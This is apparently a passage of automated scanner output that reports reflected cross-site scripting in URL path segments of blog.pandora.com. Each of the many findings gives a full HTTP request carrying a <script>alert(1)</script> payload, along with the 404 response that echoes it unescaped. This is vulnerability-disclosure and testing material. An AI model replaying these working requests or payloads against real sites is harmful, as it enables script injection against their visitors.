HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c182<script>alert(1)</script>7e15c131859 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeaa6<script>alert(1)</script>49ec8fcf801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c8e6<script>alert(1)</script>556bf3f5c92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63082<script>alert(1)</script>4fcc9a5c39d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c796c<script>alert(1)</script>b994e2fabda was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20951<script>alert(1)</script>3f4155b1d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora20951<script>alert(1)</script>3f4155b1d79/archives/2007/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7e680<script>alert(1)</script>f859f382f9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7e680<script>alert(1)</script>f859f382f9e/2007/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2c7bb<script>alert(1)</script>5838fc16302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20072c7bb<script>alert(1)</script>5838fc16302/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f55fa<script>alert(1)</script>7c644c21c33 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/09f55fa<script>alert(1)</script>7c644c21c33/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9be9<script>alert(1)</script>acf0b51a28e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf9be9<script>alert(1)</script>acf0b51a28e/archives/2007/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bafa8<script>alert(1)</script>40e95af5aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbafa8<script>alert(1)</script>40e95af5aab/2007/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 18bad<script>alert(1)</script>8f17e8b3118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200718bad<script>alert(1)</script>8f17e8b3118/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d51e2<script>alert(1)</script>da535d0049d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/10d51e2<script>alert(1)</script>da535d0049d/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17f6e<script>alert(1)</script>7ad2feaf14c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora17f6e<script>alert(1)</script>7ad2feaf14c/archives/2007/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9e9a<script>alert(1)</script>743af107344 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa9e9a<script>alert(1)</script>743af107344/2007/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76aa1<script>alert(1)</script>70d85d884f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be509<script>alert(1)</script>31065c5cb7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22432<script>alert(1)</script>251e4966396 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6520c<script>alert(1)</script>295fc6b8631 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6d8f<script>alert(1)</script>3888aff47e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
